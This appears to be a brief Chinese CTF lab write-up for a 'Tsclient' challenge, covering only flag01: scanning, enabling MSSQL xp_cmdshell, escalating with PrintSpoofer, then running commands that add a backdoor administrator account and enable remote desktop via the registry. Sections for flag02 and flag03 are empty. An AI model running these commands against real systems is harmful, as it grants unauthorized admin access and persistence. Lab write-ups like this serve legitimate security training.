春秋云镜Tsclient

春秋云镜Tsclient

一、简介

二、flag01

打开环境,探测端口

fscan扫描发现mssql服务开启

使用mdtu连接上去,先激活xpcmdshell,再执行命令,得到当前用户是mssqlserver

接下来用土豆提权,使用几个土豆都报错,最后使用PrintSpoofer提权成功

PrintSpoofer64.exe -c -i cmd

接下来肯定是要添加上一个管理员用户并打开3389端口,方便后面远程桌面连接上去

net user myiiing qwer1234! /add
net localgroup administrators myiiing /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

flag01在Adminstrator文件夹下面

二、flag02

三、flag03